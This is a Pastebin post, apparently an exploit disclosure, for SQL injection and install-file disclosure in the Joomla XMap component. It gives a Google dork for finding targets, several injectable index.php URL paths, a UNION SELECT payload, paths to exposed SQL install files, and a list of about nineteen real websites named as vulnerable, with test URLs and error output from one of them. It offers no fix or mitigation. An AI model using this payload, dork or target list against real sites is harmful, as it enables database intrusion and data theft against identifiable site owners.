Advertisement
KingSkrupellos

Joomla XMap Components 2.3.0 SQL Injection / Database Disc

Jan 30th, 2019
264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.25 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 30/01/2019
  7. # Vendor Homepage : joomla.org
  8. # Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip
  9. joomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882
  10. rsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html
  11. # Software Information Link : joomla4ever.org/extensions/ext-xmap
  12. # Software Versions : 1.2.7 / 2.3.0 and other versions
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : inurl:''/index.php?option=com_xmap''
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. CWE-200 [ Information Exposure ]
  20. # Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678
  21. Note : Keep in mind. This Exploit/Vuln has been told in more details.
  22. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  23. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  24. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  25. # Reference Link : cxsecurity.com/issue/WLB-2019010285
  26.  
  27. ####################################################################
  28.  
  29. # Description about Software :
  30. ***************************
  31.  
  32. "XMAP" is open source software for Joomla.
  33.  
  34. ####################################################################
  35.  
  36. # Impact :
  37. ***********
  38. * SQL injection vulnerability in xmap (com_xmap) component for Joomla!
  39.  
  40. allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.
  41.  
  42. * Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code.
  43.  
  44. * The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php'
  45.  
  46. is not properly sanitised before being used in a SQL query.
  47.  
  48. ####################################################################
  49.  
  50. # SQL Injection Exploit :
  51. **********************
  52.  
  53. /index.php?option=com_xmap&Itemid=[SQL Injection]
  54.  
  55. /index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection]
  56.  
  57. /index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection]
  58.  
  59. /index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]
  60.  
  61. # Exploit Payload :
  62. *****************
  63.  
  64. -1 UNION SELECT 1,2,3,version(),5,6,7,8--
  65.  
  66. ####################################################################
  67.  
  68. # Database Disclosure Exploit :
  69. ****************************
  70.  
  71. /administrator/components/com_xmap/install/install.postgresql.sql
  72.  
  73. /administrator/components/com_xmap/install/install.utf8.sql
  74.  
  75. /administrator/components/com_xmap/install/uninstall.postgresql.sql
  76.  
  77. /administrator/components/com_xmap/install/uninstall.utf8.sql
  78.  
  79. ####################################################################
  80.  
  81. # Example Vulnerable Sites :
  82. *************************
  83.  
  84. [+] sab-uae.com/web/administrator/components/com_xmap/install/install.utf8.sql
  85.  
  86. [+] didasconline.it/didasco/index.php?option=com_xmap&sitemap=1&Itemid=6%27
  87.  
  88. [+] beta.systemsvalley.com/index.php?option=com_xmap&view=html&id=1&Itemid=318%27
  89.  
  90. [+] agenda21.waw.pl/index.php?option=com_xmap&sitemap=1&Itemid=52%27
  91.  
  92. [+] arcoeste.it/portale/index.php?option=com_xmap&sitemap=1&Itemid=95%27
  93.  
  94. [+] old.bit-karton.ru/index.php?option=com_xmap&view=html&id=0&Itemid=173%27
  95.  
  96. [+] thscleaning.co.uk/index.php?option=com_xmap&sitemap=1&Itemid=8%27
  97.  
  98. [+] emmekappa.eu/index.php?option=com_xmap&view=html&id=1&Itemid=155%27
  99.  
  100. [+] ortopedie-mangalia.ro/index.php?option=com_xmap&sitemap=1&Itemid=8%27
  101.  
  102. [+] atabeh.ps/index.php?option=com_xmap&sitemap=1&Itemid=51%27
  103.  
  104. [+] acmu.fr/index.php?option=com_xmap&Itemid=124%27
  105.  
  106. [+] solardid.com/index.php?option=com_xmap&sitemap=1&Itemid=9%27
  107.  
  108. [+] serviceairtunisia.com/index.php?option=com_xmap&sitemap=1&Itemid=30%27
  109.  
  110. [+] cprsanmiguel.com/index.php?option=com_xmap&sitemap=1&Itemid=65%27
  111.  
  112. [+] arrozsonora.com.co/index.php?option=com_xmap&sitemap=1&Itemid=9%27
  113.  
  114. [+] annegil.crouzevialle.free.fr/index.php?option=com_xmap&sitemap=1&Itemid=43%27
  115.  
  116. [+] truongsonfurniture.com/index.php?option=com_xmap&view=html&id=1&Itemid=137%27
  117.  
  118. [+] apedema.org.br/index.php?option=com_xmap&sitemap=1&Itemid=17%27
  119.  
  120. [+] garagepiccina.ch/index.php?option=com_xmap&sitemap=1&Itemid=15%27
  121.  
  122. ####################################################################
  123.  
  124. # Example SQL Database Error :
  125. ****************************
  126.  
  127. Strict Standards: Declaration of JCacheControllerPage::store() should be compatible
  128. with JCacheController::store($data, $id, $group = NULL) in /home
  129. /systemsvalley/subdomains/beta.systemsvalley.com/libraries
  130. /joomla/cache/controller/page.php on line 0
  131.  
  132. Warning: session_start() [function.session-start]: Cannot send session cookie -
  133. headers already sent by (output started at /htdocs/public/www/configuration.php:1)
  134. in /htdocs/public/www/libraries/joomla/session/session.php on line 413
  135.  
  136. ####################################################################
  137.  
  138. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  139.  
  140. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement